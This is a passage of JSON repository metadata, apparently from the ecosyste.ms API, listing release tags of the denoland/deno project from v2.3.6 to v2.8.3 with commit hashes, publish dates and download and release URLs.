00Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"